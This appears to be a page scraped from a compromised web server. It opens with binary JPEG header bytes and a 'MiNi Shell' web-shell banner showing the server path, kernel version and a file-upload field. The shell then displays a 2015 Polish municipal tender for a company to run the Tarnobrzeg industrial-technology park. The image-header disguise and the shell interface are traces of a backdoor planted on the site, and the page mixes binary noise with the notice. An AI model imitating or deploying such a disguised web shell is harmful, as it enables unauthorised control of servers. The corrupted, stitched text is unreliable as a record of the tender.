JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150910/134095-N-2015.html

<p class="kh_header"><b>Tarnobrzeg: Pełnienie funkcji Operatora zarządzającego
Tarnobrzeskim Parkiem Przemysłowo-Technologicznym</b><br>
<b>Numer ogłoszenia: 134095 - 2015; data zamieszczenia: 10.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Tarnobrzega , ul. Kościuszki 32, 39-400 Tarnobrzeg, woj. podkarpackie, tel. 015 8226570, faks 015 8222504.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnobrzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Operatora zarządzającego
Tarnobrzeskim Parkiem Przemysłowo-Technologicznym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie funkcji Operatora zarządzającego Tarnobrzeskim Parkiem Przemysłowo-Technologicznym należy rozumieć jako świadczenie usługi dotyczącej zarządzania w zakresie:
Zadania Wykonawcy w zakresie gospodarowania nieruchomościami TPP-T
1)Sprawowanie w imieniu Zamawiającego czynności administracyjnych nad powierzonym majątkiem, a w szczególności nad prawidłową eksploatacją oraz utrzymaniem właściwego stanu technicznego budynków, budowli, urządzeń technicznych, (kotłowni, paneli grzewczych, windy itp.) zgodnie z przekazanymi przez Zamawiającego instrukcjami obsługi, a także obowiązującymi przepisami prawa w tym zakresie.
2)Zawieranie umów i dokonywanie okresowych przeglądów i konserwacji budynków oraz urządzeń technicznych znajdujących się w obiektach TPP-T związanych z kontrolą stanu oraz kontrolą wykonania remontów i konserwacji. 
3)Przygotowanie zasad korzystania i wysokości opłat za użytkowanie kanału teletechnicznego i infrastruktury teletechnicznej znajdujących się na terenie parku.
4)Nadzór nad ochroną powierzonego majątku tj. budynków hali, inkubatora oraz całym terenem TPP-T ograniczonym szlabanami od Alei Warszawskiej oraz ul. Batalionów Chłopskich.
5)Zawieranie umów z dostawcami usług związanych z bieżącym utrzymaniem infrastruktury TPP-T i nadzór nad ich realizacją.
6)Za letnie i zimowe utrzymanie dróg dojazdowych do Parku, dróg wewnątrz parku i parkingów 
odpowiadać będzie Gmina Tarnobrzeg. Operator odpowiedzialny będzie za utrzymanie letnie i 
zimowe ciągów pieszych na terenie TPP-T.
7)Zapewnienie porządku wewnątrz obiektów TPP-T tj: hali i inkubatora oraz bieżące sprzątanie części wspólnych obiektów tj: korytarzy, nie wynajętych boksów w inkubatorze, klatek schodowych, sanitariatów, windy, okien ( mycie nie mniej niż 2 razy w roku) itp., a także dbałość o porządek i estetykę wokół obiektów. 
8)Za utrzymanie zimowe dachu na obiektach parku, będzie odpowiedzialny Zamawiający. Operator zobowiązany będzie do poinformowania Zamawiającego o potrzebie odśnieżania dachu.
9)Zawieranie i rozwiazywanie w imieniu i na rzecz Gminy Tarnobrzeg umów najmu lub dzierżawy z przedsiębiorcami rozpoczynającymi działalność gospodarczą na terenie TPP-T z uwzględnieniem opłaty za media, zgodnie z  regulaminem TPP-T. 
10)Dokonywanie naboru przedsiębiorców do TPP-T zgodnie z obowiązującym regulaminem parku oraz przy uwzględnieniu wytycznych dotyczących funkcjonowania Parków Przemysłowo- Technologicznych oraz PO RPW. 
11)Prowadzenie badania rynku dotyczącego zapotrzebowania na nieruchomości zabudowane i niezabudowane pod działalność gospodarczą.
12)Opracowywanie kalkulacji kosztów najmu i dzierżawy nieruchomości.
13)Opracowywanie aktualizacji regulaminu TPP-T wraz ze wszystkimi załącznikami każdorazowo w przypadku zaistnienia takiej potrzeby zgodnie z wytycznymi.
14)Naliczanie i pobieranie wszelkich opłat wynikających z tytułu najmu i dzierżawy powierzchni 
na terenie parku oraz innych opłat m.in. opłaty eksploatacyjnej, opłat za media, zgodnie z zatwierdzonym regulaminem parku.
15)Wystawianie w imieniu i na rzecz Zamawiającego faktur sprzedaży za najem lub dzierżawę oraz z tytułu innych opłat przedsiębiorcom prowadzącym działalność na terenie TPP-T.
16)Wykonawca zobowiązany jest wykonywać zlecone czynności z należytą starannością 
i rzetelnością w oparciu o obowiązujące przepisy prawa a także chronić interes Zamawiającego w trakcie realizacji powierzonych zadań i czynności oraz zobowiązuje się do racjonalnego gospodarowania środkami finansowymi.

Zadania Wykonawcy w zakresie promocji TPP-T
1)Prowadzenie aktywnej działalności promocyjnej i informacyjnej stwarzającej zachętę dla potencjalnych użytkowników TPP-T oraz budowanie pozytywnego wizerunku parku w środowisku zewnętrznym i wewnętrznym poprzez:
udział w minimum 3 targach o charakterze krajowym w branży: innowacji i nowych technologii,  
  inwestycyjnych lub kooperacyjnych,
udział w konferencjach i wydarzeniach gospodarczych,
stały kontakt z instytucjami otoczenia biznesu w Polsce ( np. PAIiZ, ARP, itd.),
stały kontakt z Parkami Technologicznymi działającymi w Polsce,
organizacja szkoleń na podstawie zakupionej infrastruktury - minimum 6 szt,
dbałość o tablice promocyjne, w tym pylony, 
opracowanie i wykonanie dwóch broszur informacyjno- promocyjnych dla TPP-T,
nawiązanie współpracy ze szkołami ponadgimnazjalnymi i wyższymi w celu promowania 
  przedsiębiorczości wśród młodzieży.	
2)Stosowanie przy zamawianiu dóbr i usług w imieniu Gminy Tarnobrzeg  procedur wynikających 
z przepisów PZP obowiązujących dla projektów dofinansowanych przez UE oraz wewnętrznych regulaminów Urzędu Miasta Tarnobrzega.
3)Przygotowanie  planu promocji TPP-T, w ciągu miesiąca od podpisania umowy i przekazanie go do akceptacji Zamawiającemu.
4)Inicjowanie przy współpracy z Wydziałami Urzędu Miasta Tarnobrzega działań marketingowych mających na celu promocję oferty parku.
5)Administrowanie i zarządzanie stroną internetową TPP-T.Aktywne zarządzanie profilem fb TPP-T, minimum jeden news w tygodniu. Redagowanie aktualności - aktywność minimum raz w miesiącu.
6)Prezentacja TPP-T na portalach społecznościowych.
7)Współpraca z mediami - przygotowywanie materiałów informacyjnych.
8)Planowanie i organizowanie wydarzeń o charakterze gospodarczym i edukacyjnym. 
Organizacja minimum dwóch konferencji lub targów.

Zadania Wykonawcy w zakresie finansowo-księgowym TPP-T 
1)Prowadzenie biura Wykonawcy w budynku Inkubatora Technologicznego TPP-T. 
Operator we własnym zakresie zapewni wyposażenie biura. Zamawiający wynajmie Operatorowi pomieszczenia przeznaczone na biuro. Operator zapewni kadrę stanowiącą zespół zarządzający złożony minimum z 4 osób, spełniających kryteria w postępowaniu, które  będą świadczyły  pracę na rzecz Operatora tj.:
Dyrektor Parku i Specjalista ds. finansowych i administracyjnych w pełnym wymiarze czasu pracy tj. 40 godzin tygodniowo.,
Specjalista do spraw technicznych i Informatyk - w razie potrzeb i na żądanie Dyrektora Parku.
2)Sporządzanie okresowych sprawozdań i raportów oraz projektów planów rzeczowo-finansowych (budżetów) dotyczących prowadzonej działalności przez TPP-T.
3)Prowadzenie rejestru zaświadczeń o udzieleniu pomocy publicznej oraz innych dokumentów wydawanych przez Zamawiającego, ewidencji zdarzeń gospodarczych dotyczących funkcjonowania TPP-T, w oparciu o obowiązujące przepisy prawne i regulamin parku.
4)Wykonawca będzie przekazywał Zamawiającemu, niezwłocznie po otrzymaniu i zatwierdzeniu pod względem rachunkowym i merytorycznym, faktury zakupu usług dotyczących dostawy mediów oraz usług pozostałych, wystawionych na Gminę Tarnobrzeg, w nieprzekraczalnym terminie niezbędnym do realizacji płatności (tj. minimum 7 dni przed terminem płatności). W przeciwnym wypadku kosztem odsetek za zwłokę zostanie obciążony Wykonawca. Zbiorcze zestawienie otrzymanych faktur Wykonawca będzie przekazywał w terminie do 5 dni od końca miesiąca, którego one dotyczą. 
5)Termin płatności zobowiązań, wyznaczony przez Wykonawcę podmiotom zewnętrznym, nie może być krótszy niż 14 dni roboczych.
6)Wykonawca wystawia faktury sprzedaży i prowadzi ewidencję sprzedaży VAT. Sprzedającym jest Gmina Tarnobrzeg, zaś wystawiającym faktury VAT jest Wykonawca. Ewidencja dokumentacji prowadzona jest w formie rejestru sprzedaży VAT, który po zamknięciu miesiąca przekazywany jest do Wydziału Budżetu i Finansów Zamawiającego w terminie do 5 dni od końca miesiąca, którego dotyczy wraz z oryginałami faktur.
7)Wykonawca otrzyma od Zamawiającego stosowne upoważnienie do wystawiania i otrzymywania faktur VAT.
8)Wpływy z tytułu czynszów najmu i dzierżawy, opłat za media należne na podstawie wystawionych faktur stanowią przychód Zamawiającego.
9)Wykonawca jest zobowiązany przekazywać w danym miesiącu wszelkie należne przychody 
na rzecz Zamawiającego na konto Nr 18 1240 2744 1111 0000 3990 9547:
a)uzyskane wg stanu na 20 dzień danego miesiąca - w terminie do 25-go dnia danego miesiąca,
b)uzyskane wg stanu na ostatni dzień danego miesiąca - w terminie do 5-go dnia miesiąca następnego.
10)Wykonawca będzie informował najemców i dzierżawców powierzchni na terenie parku 
o obowiązku ponoszenia kosztów podatku od nieruchomości oraz będzie przekazywał 
do Wydziału Budżetu i Finansów Zamawiającego 1 egz. umowy zawartej z inwestorem w terminie 7 dni od daty jej zawarcia.  
11)Wykonawca ma obowiązek dołożenia wszelkiej staranności celem uzyskania od najemców czynszów oraz innych opłat z tytułu najmu w pełnej przypisanej wysokości.
12)Wykonawca będzie naliczał i pobierał odsetki za zwłokę w zapłacie czynszów najmu i dzierżawy oraz innych należności. 
13)W razie wystąpienia zaległości Wykonawca windykuje je podejmując niezbędne przewidziane prawem czynności.
14)Zamawiający zobowiązuje Wykonawcę do niezwłocznego podejmowania działań w stosunku 
do najemców, którzy nie wywiązują się z obowiązujących płatności przy zastosowaniu procedur oraz sankcji w trybie określonym w obowiązujących przepisach.
15)Przy zaległościach powyżej 3-ch miesięcy, Wykonawca zobowiązany jest wszcząć procedurę 
do wyegzekwowania należności w postępowaniu sądowym i komorniczym. 
16)Wykonawca zapewni we własnym zakresie niezbędne oprogramowanie na potrzeby obsługi finansowo-księgowej w wymaganym zakresie.
17)Wykonawca zobowiązany jest do składania kwartalnych zestawień o należnych i uzyskanych przychodach na rzecz Zamawiającego oraz o zaległościach w tym zakresie, w terminie do dnia 20-tego kolejnego miesiąca po zakończeniu kwartału.
18)Wykonawca zobowiązany jest do składania zestawień niezbędnych Zamawiającemu, na jego żądanie w terminie ustalonym z Zamawiającym.
19)Wykonawca zobowiązany jest do przechowywania i archiwizowania źródłowych dokumentów finansowo-księgowych zgodnie z obowiązującymi w tym zakresie przepisami.
Zadania Wykonawcy w zakresie prowadzenia TPP-T jako ośrodka innowacyjności.
1)Do obowiązków Wykonawcy należy w szczególności: stosowanie się do zapisów zawartych we  wniosku aplikacyjnym projektu pn: Tarnobrzeski Park Przemysłowo- Technologiczny oraz umowy dofinansowanie nr POPW.01.03.00-06-001/10-00 z dnia 25.06.2010 r.
2)Prowadzenie działań mających na celu zapewnienie korzystnych warunków do lokowania 
           w TPP-T firm  prowadzących działalność  innowacyjną.
3)Świadczenie usług szkoleniowych i doradczych w zakresie m.in: działalności gospodarczej, innowacyjnej oraz finansowania działalności gospodarczej.
4)Świadczenie usług prorozwojowych dla lokatorów w TPP-T i klientów zewnętrznych.
5)Nawiązywanie współpracy z potencjalnymi przedsiębiorcami .
6)Wsparcie przedsiębiorców w zakresie pozyskiwania środków zewnętrznych na rozwój przedsiębiorstwa.
7)Wykonawca winien uwzględnić konieczność wykonywania innych obowiązków niż wymienionych w przedmiocie zamówienia, a niezbędnych do prawidłowego wykonywania zadań Operatora zarządzającego TPP-T oraz prawidłowego funkcjonowania Parku..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.33.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz  z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów , na rzecz których usługi zostały wykonane oraz  załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie:
co najmniej 1 usługę, polegającą na zarządzaniu i administrowaniu Parkiem Technologicznym
 o kubaturze 5 tys. m3 przez okres 1 rokuco najmniej 5 usług doradczych m.in: w zakresie prowadzenia działalności gospodarczej oraz 5 szkoleń dla osób rozpoczynających działalność gospodarczą.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. 
Wykonawca przedstawi wraz z ofertą osoby, na funkcje wymienione poniżej, które spełniają następujące wymagania: 

1)	Dyrektor Parku - osoba posiadająca wykształcenie wyższe, biegła znajomość j. angielskiego, co 
     najmniej 3 letnie doświadczenie na stanowisku kierowniczym.
2)	Specjalista do spraw technicznych - wykształcenie techniczne, w branży budowlanej lub sanitarnej.
3) Specjalista ds. finansowych i administracyjnych - wykształcenie wyższe, co najmniej 3 lata 
    doświadczenia w zakresie finansów i księgowości.
4) Informatyk - wykształcenie wyższe informatyczne.
Uwaga: Zamawiający  nie dopuszcza łączenia wyżej  wymienionych funkcji przez jedną osobę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Doświadczenie - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
1) zmiany w składzie zespołu Operatora 
2) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia w tym zmiana podatku od towarów i usług VAT.
3)wystąpienia zjawisk związanych z działaniem siły wyższej (klęska żywiołowa, niepokoje społeczne,   działania militarne itp.), 
4) zmiany podyktowanej zmianą przepisów prawa
5) ograniczenia finansowego po stronie Zamawiającego z przyczyn od niego niezależnych.
6) jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą, czego strony nie przewidywały przy zawarciu umowy (§ 3571 kc)
